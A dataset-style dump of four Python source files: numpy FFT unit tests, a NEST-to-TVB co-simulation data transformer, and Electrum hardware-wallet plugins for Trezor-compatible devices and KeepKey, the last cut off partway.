| source (string, 3-86 chars) | python (string, 75-1.04M chars) |
|---|---|
test_pocketfft.py
|
import numpy as np
import pytest
from numpy.random import random
from numpy.testing import (
assert_array_equal, assert_raises, assert_allclose
)
import threading
import sys
if sys.version_info[0] >= 3:
import queue
else:
import Queue as queue
def fft1(x):
L = len(x)
phase = -2j*np.pi*(np.arange(L)/float(L))
phase = np.arange(L).reshape(-1, 1) * phase
return np.sum(x*np.exp(phase), axis=1)
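# Hedged illustration (not part of the original test module): fft1 above is the
# naive O(N^2) reference DFT that test_fft below compares np.fft.fft against.
# The matching naive inverse flips the sign of the phase and divides by the
# length, so ifft1(fft1(x)) recovers x up to rounding error:
def ifft1(x):
    L = len(x)
    phase = 2j*np.pi*(np.arange(L)/float(L))
    phase = np.arange(L).reshape(-1, 1) * phase
    return np.sum(x*np.exp(phase), axis=1) / L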
class TestFFTShift:
def test_fft_n(self):
assert_raises(ValueError, np.fft.fft, [1, 2, 3], 0)
class TestFFT1D:
def test_identity(self):
maxlen = 512
x = random(maxlen) + 1j*random(maxlen)
xr = random(maxlen)
for i in range(1,maxlen):
assert_allclose(np.fft.ifft(np.fft.fft(x[0:i])), x[0:i],
atol=1e-12)
assert_allclose(np.fft.irfft(np.fft.rfft(xr[0:i]),i),
xr[0:i], atol=1e-12)
def test_fft(self):
x = random(30) + 1j*random(30)
assert_allclose(fft1(x), np.fft.fft(x), atol=1e-6)
assert_allclose(fft1(x) / np.sqrt(30),
np.fft.fft(x, norm="ortho"), atol=1e-6)
@pytest.mark.parametrize('norm', (None, 'ortho'))
def test_ifft(self, norm):
x = random(30) + 1j*random(30)
assert_allclose(
x, np.fft.ifft(np.fft.fft(x, norm=norm), norm=norm),
atol=1e-6)
# Ensure we get the correct error message
with pytest.raises(ValueError,
match='Invalid number of FFT data points'):
np.fft.ifft([], norm=norm)
def test_fft2(self):
x = random((30, 20)) + 1j*random((30, 20))
assert_allclose(np.fft.fft(np.fft.fft(x, axis=1), axis=0),
np.fft.fft2(x), atol=1e-6)
assert_allclose(np.fft.fft2(x) / np.sqrt(30 * 20),
np.fft.fft2(x, norm="ortho"), atol=1e-6)
def test_ifft2(self):
x = random((30, 20)) + 1j*random((30, 20))
assert_allclose(np.fft.ifft(np.fft.ifft(x, axis=1), axis=0),
np.fft.ifft2(x), atol=1e-6)
assert_allclose(np.fft.ifft2(x) * np.sqrt(30 * 20),
np.fft.ifft2(x, norm="ortho"), atol=1e-6)
def test_fftn(self):
x = random((30, 20, 10)) + 1j*random((30, 20, 10))
assert_allclose(
np.fft.fft(np.fft.fft(np.fft.fft(x, axis=2), axis=1), axis=0),
np.fft.fftn(x), atol=1e-6)
assert_allclose(np.fft.fftn(x) / np.sqrt(30 * 20 * 10),
np.fft.fftn(x, norm="ortho"), atol=1e-6)
def test_ifftn(self):
x = random((30, 20, 10)) + 1j*random((30, 20, 10))
assert_allclose(
np.fft.ifft(np.fft.ifft(np.fft.ifft(x, axis=2), axis=1), axis=0),
np.fft.ifftn(x), atol=1e-6)
assert_allclose(np.fft.ifftn(x) * np.sqrt(30 * 20 * 10),
np.fft.ifftn(x, norm="ortho"), atol=1e-6)
def test_rfft(self):
x = random(30)
for n in [x.size, 2*x.size]:
for norm in [None, 'ortho']:
assert_allclose(
np.fft.fft(x, n=n, norm=norm)[:(n//2 + 1)],
np.fft.rfft(x, n=n, norm=norm), atol=1e-6)
assert_allclose(
np.fft.rfft(x, n=n) / np.sqrt(n),
np.fft.rfft(x, n=n, norm="ortho"), atol=1e-6)
def test_irfft(self):
x = random(30)
assert_allclose(x, np.fft.irfft(np.fft.rfft(x)), atol=1e-6)
assert_allclose(
x, np.fft.irfft(np.fft.rfft(x, norm="ortho"), norm="ortho"), atol=1e-6)
def test_rfft2(self):
x = random((30, 20))
assert_allclose(np.fft.fft2(x)[:, :11], np.fft.rfft2(x), atol=1e-6)
assert_allclose(np.fft.rfft2(x) / np.sqrt(30 * 20),
np.fft.rfft2(x, norm="ortho"), atol=1e-6)
def test_irfft2(self):
x = random((30, 20))
assert_allclose(x, np.fft.irfft2(np.fft.rfft2(x)), atol=1e-6)
assert_allclose(
x, np.fft.irfft2(np.fft.rfft2(x, norm="ortho"), norm="ortho"), atol=1e-6)
def test_rfftn(self):
x = random((30, 20, 10))
assert_allclose(np.fft.fftn(x)[:, :, :6], np.fft.rfftn(x), atol=1e-6)
assert_allclose(np.fft.rfftn(x) / np.sqrt(30 * 20 * 10),
np.fft.rfftn(x, norm="ortho"), atol=1e-6)
def test_irfftn(self):
x = random((30, 20, 10))
assert_allclose(x, np.fft.irfftn(np.fft.rfftn(x)), atol=1e-6)
assert_allclose(
x, np.fft.irfftn(np.fft.rfftn(x, norm="ortho"), norm="ortho"), atol=1e-6)
def test_hfft(self):
x = random(14) + 1j*random(14)
x_herm = np.concatenate((random(1), x, random(1)))
x = np.concatenate((x_herm, x[::-1].conj()))
assert_allclose(np.fft.fft(x), np.fft.hfft(x_herm), atol=1e-6)
assert_allclose(np.fft.hfft(x_herm) / np.sqrt(30),
np.fft.hfft(x_herm, norm="ortho"), atol=1e-6)
def test_ihfft(self):
x = random(14) + 1j*random(14)
x_herm = np.concatenate((random(1), x, random(1)))
x = np.concatenate((x_herm, x[::-1].conj()))
assert_allclose(x_herm, np.fft.ihfft(np.fft.hfft(x_herm)), atol=1e-6)
assert_allclose(
x_herm, np.fft.ihfft(np.fft.hfft(x_herm, norm="ortho"),
norm="ortho"), atol=1e-6)
@pytest.mark.parametrize("op", [np.fft.fftn, np.fft.ifftn,
np.fft.rfftn, np.fft.irfftn])
def test_axes(self, op):
x = random((30, 20, 10))
axes = [(0, 1, 2), (0, 2, 1), (1, 0, 2), (1, 2, 0), (2, 0, 1), (2, 1, 0)]
for a in axes:
op_tr = op(np.transpose(x, a))
tr_op = np.transpose(op(x, axes=a), a)
assert_allclose(op_tr, tr_op, atol=1e-6)
def test_all_1d_norm_preserving(self):
# verify that round-trip transforms are norm-preserving
x = random(30)
x_norm = np.linalg.norm(x)
n = x.size * 2
func_pairs = [(np.fft.fft, np.fft.ifft),
(np.fft.rfft, np.fft.irfft),
# hfft: order so the first function takes x.size samples
# (necessary for comparison to x_norm above)
(np.fft.ihfft, np.fft.hfft),
]
for forw, back in func_pairs:
for n in [x.size, 2*x.size]:
for norm in [None, 'ortho']:
tmp = forw(x, n=n, norm=norm)
tmp = back(tmp, n=n, norm=norm)
assert_allclose(x_norm,
np.linalg.norm(tmp), atol=1e-6)
@pytest.mark.parametrize("dtype", [np.half, np.single, np.double,
np.longdouble])
def test_dtypes(self, dtype):
# make sure that all input precisions are accepted and internally
# converted to 64bit
x = random(30).astype(dtype)
assert_allclose(np.fft.ifft(np.fft.fft(x)), x, atol=1e-6)
assert_allclose(np.fft.irfft(np.fft.rfft(x)), x, atol=1e-6)
@pytest.mark.parametrize(
"dtype",
[np.float32, np.float64, np.complex64, np.complex128])
@pytest.mark.parametrize("order", ["F", 'non-contiguous'])
@pytest.mark.parametrize(
"fft",
[np.fft.fft, np.fft.fft2, np.fft.fftn,
np.fft.ifft, np.fft.ifft2, np.fft.ifftn])
def test_fft_with_order(dtype, order, fft):
# Check that FFT/IFFT produces identical results for C, Fortran and
# non-contiguous arrays
rng = np.random.RandomState(42)
X = rng.rand(8, 7, 13).astype(dtype, copy=False)
# See discussion in pull/14178
_tol = 8.0 * np.sqrt(np.log2(X.size)) * np.finfo(X.dtype).eps
if order == 'F':
Y = np.asfortranarray(X)
else:
# Make a non-contiguous array
Y = X[::-1]
X = np.ascontiguousarray(X[::-1])
if fft.__name__.endswith('fft'):
for axis in range(3):
X_res = fft(X, axis=axis)
Y_res = fft(Y, axis=axis)
assert_allclose(X_res, Y_res, atol=_tol, rtol=_tol)
elif fft.__name__.endswith(('fft2', 'fftn')):
axes = [(0, 1), (1, 2), (0, 2)]
if fft.__name__.endswith('fftn'):
axes.extend([(0,), (1,), (2,), None])
for ax in axes:
X_res = fft(X, axes=ax)
Y_res = fft(Y, axes=ax)
assert_allclose(X_res, Y_res, atol=_tol, rtol=_tol)
else:
raise ValueError()
class TestFFTThreadSafe:
threads = 16
input_shape = (800, 200)
def _test_mtsame(self, func, *args):
def worker(args, q):
q.put(func(*args))
q = queue.Queue()
expected = func(*args)
# Spin off a bunch of threads to call the same function simultaneously
t = [threading.Thread(target=worker, args=(args, q))
for i in range(self.threads)]
[x.start() for x in t]
[x.join() for x in t]
# Make sure all threads returned the correct value
for i in range(self.threads):
assert_array_equal(q.get(timeout=5), expected,
'Function returned wrong value in multithreaded context')
def test_fft(self):
a = np.ones(self.input_shape) * 1+0j
self._test_mtsame(np.fft.fft, a)
def test_ifft(self):
a = np.ones(self.input_shape) * 1+0j
self._test_mtsame(np.fft.ifft, a)
def test_rfft(self):
a = np.ones(self.input_shape)
self._test_mtsame(np.fft.rfft, a)
def test_irfft(self):
a = np.ones(self.input_shape) * 1+0j
self._test_mtsame(np.fft.irfft, a)
|
nest_to_tvb.py
|
# Copyright 2020 Forschungszentrum Jülich GmbH and Aix-Marseille Université
# "Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements; and to You under the Apache License, Version 2.0. "
from mpi4py import MPI
import os
import json
import time
import numpy as np
from nest_elephant_tvb.utils import create_logger
from nest_elephant_tvb.transformation.simulator_IO.Nest_IO import ConsumerNestData
from nest_elephant_tvb.transformation.simulator_IO.TVB_IO import ProducerTVBData
from nest_elephant_tvb.transformation.transformation_function.transformation_function import TransformationSpikeRate
from nest_elephant_tvb.transformation.communication.internal_mpi import MPICommunication
from nest_elephant_tvb.transformation.communication.internal_thread import ThreadCommunication
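# Usage sketch (inferred from the argument and rank checks below, not from
# project documentation): the script takes one argument, the simulation output
# directory, and must be launched either on a single MPI rank (thread-based
# internal communication) or on exactly three ranks (receive / transform /
# send), for example:
#   mpirun -n 3 python nest_to_tvb.py /path/to/result_sim/co-simulation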
if __name__ == "__main__":
import sys
if len(sys.argv) != 2:
print('incorrect number of arguments')
exit(1)
# Parse arguments
path = sys.argv[1] # path of the simulation
# path = "/home/vagrant/multiscale-cosim-repos/TVB-NEST-demo/result_sim/co-simulation/"
id_transformer = 0 # index of the transformer
# take the parameters and instantiate objects
with open(path + '/parameter.json') as f:
parameters = json.load(f)
id_proxy = [0]
level_log = parameters['level_log']
logger = create_logger(path, 'nest_to_tvb_' + str(id_transformer), level_log)
rank = MPI.COMM_WORLD.Get_rank()
# get information from NEST
while not os.path.exists(path + '/nest/spike_detector.txt.unlock'):
logger.info("spike detector ids not found yet, retry in 1 second")
time.sleep(1)
spike_detector = np.loadtxt(path + '/nest/spike_detector.txt', dtype=int)
# case of one spike detector
try:
spike_detector = np.array([int(spike_detector)])
except TypeError:  # more than one spike detector: keep the loaded array as-is
pass
id_spike_detector = spike_detector[id_transformer]
file_spike_detector = "/transformation/spike_detector/" + str(id_spike_detector) + ".txt"
TVB_recev_file = "/transformation/send_to_tvb/" + str(id_proxy[id_transformer]) + ".txt"
id_spike_detector = os.path.splitext(os.path.basename(path + file_spike_detector))[0]
if MPI.COMM_WORLD.Get_size() == 3: # MPI internal communication
if rank == 0: # communication with Nest
receive_data_from_nest = ConsumerNestData(
'nest_to_tvb_receive' + str(id_spike_detector), path, level_log,
communication_intern=MPICommunication, buffer_r_w=[2, 0])
path_to_files_receive = [path + file_spike_detector]
receive_data_from_nest.run(path_to_files_receive)
elif rank == 1: # communication with TVB
send_data_to_TVB = ProducerTVBData(
'nest_to_tvb_send' + str(id_spike_detector), path, level_log,
communication_intern=MPICommunication, sender_rank=2, buffer_r_w=[2, 0])
path_to_files_send = [path + TVB_recev_file]
send_data_to_TVB.run(path_to_files_send)
elif rank == 2: # transformation from spike to rate
transformation = TransformationSpikeRate(
id_transformer, parameters,
'nest_to_tvb_translate' + str(id_spike_detector), path, level_log,
communication_intern=MPICommunication, receiver_rank=1, buffer_r_w=[2, 0])
transformation.run(None)
else:
raise Exception('too many MPI ranks: expected 3')
elif MPI.COMM_WORLD.Get_size() == 1: # Thread internal communication
from threading import Thread
import numpy as np
# creation of the object for Nest communication
receive_data_from_nest = ConsumerNestData(
'nest_to_tvb_receive' + str(id_spike_detector), path, level_log,
communication_intern=ThreadCommunication,
buffer_write_status=np.ones((1, 1), dtype=int) * -2,
buffer_write_shape=(1000000 * 3, 1),
)
path_to_files_receive = [path + file_spike_detector]
# creation of the object for the transformation from rate to spike
transformation = TransformationSpikeRate(
id_transformer, parameters,
'nest_to_tvb_transform' + str(id_spike_detector), path, level_log,
communication_intern=ThreadCommunication,
buffer_write_status=np.ones(1) * -2,
buffer_write_shape=(2, int(parameters['time_synchronization'] / parameters['resolution'])),
buffer_read=receive_data_from_nest.communication_internal.buffer_write_data,
status_read=receive_data_from_nest.communication_internal.status_write,
lock_read=receive_data_from_nest.communication_internal.lock_write
)
# creation of the object for TVB communication
send_data_to_TVB = ProducerTVBData(
'nest_to_tvb_send' + str(id_spike_detector), path, level_log,
communication_intern=ThreadCommunication,
buffer_read=transformation.communication_internal.buffer_write_data,
status_read=transformation.communication_internal.status_write,
lock_read=transformation.communication_internal.lock_write
)
path_to_files_send = [path + TVB_recev_file]
# creation of the threads and run them
th_receive = Thread(target=receive_data_from_nest.run, args=(path_to_files_receive,))
th_transformation = Thread(target=transformation.run, args=(None,))
th_send = Thread(target=send_data_to_TVB.run, args=(path_to_files_send,))
th_receive.start()
th_transformation.start()
th_send.start()
th_transformation.join()
th_receive.join()
th_send.join()
else:
raise Exception('Wrong number of MPI ranks. The number of ranks must be 1 or 3')
if id_transformer == 0 and rank == 1:
os.remove(path + '/nest/spike_detector.txt.unlock')
|
plugin.py
|
import base64
import re
import threading
from binascii import hexlify, unhexlify
from functools import partial
from electrum_desire.bitcoin import (bc_address_to_hash_160, xpub_from_pubkey,
public_key_to_p2pkh, EncodeBase58Check,
TYPE_ADDRESS, TYPE_SCRIPT,
TESTNET, ADDRTYPE_P2PKH, ADDRTYPE_P2SH)
from electrum_desire.i18n import _
from electrum_desire.plugins import BasePlugin, hook
from electrum_desire.transaction import deserialize, Transaction
from electrum_desire.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class TrezorCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by %s') % self.device)
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated %s firmware for device labelled %s. Please '
'download the updated firmware from %s') %
(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
# Client interaction must not happen in the main GUI thread
assert self.main_thread != threading.current_thread()
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Desire Testnet" if TESTNET else "Desire"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your %s.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your %s, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
) % (self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER and self.device == 'TREZOR':
# Warn user about firmware lameness
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard):
'''Called when creating a new wallet. Select the device to use. If
the device is uninitialized, go through the initialization
process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m')
client.used()
def get_xpub(self, device_id, derivation, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = signed_tx.encode('hex')
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
client.get_address(self.get_coin_name(), address_n, True)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, x_pubkey.decode('hex'))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: x.decode('hex')[:-1] if x else '', txin.get('signatures')),
m=txin.get('num_sig'),
)
txinputtype = self.types.TxInputType(
script_type=self.types.SPENDMULTISIG,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = txin['scriptSig'].decode('hex')
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
addrtype, hash_160 = bc_address_to_hash_160(address)
index, xpubs, m = info
if addrtype == ADDRTYPE_P2PKH:
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = self.types.PAYTOADDRESS,
address_n = address_n,
)
elif addrtype == ADDRTYPE_P2SH:
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
script_type = self.types.PAYTOMULTISIG)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
addrtype, hash_160 = bc_address_to_hash_160(address)
if addrtype == ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise BaseException('addrtype')
txoutputtype.address = address
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = vout['scriptPubKey'].decode('hex')
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for d in WebUsbTransport.enumerate():
if device.id_.startswith(d.getSerialNumber()):
return WebUsbTransport(d)
return WebUsbTransport(device)
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
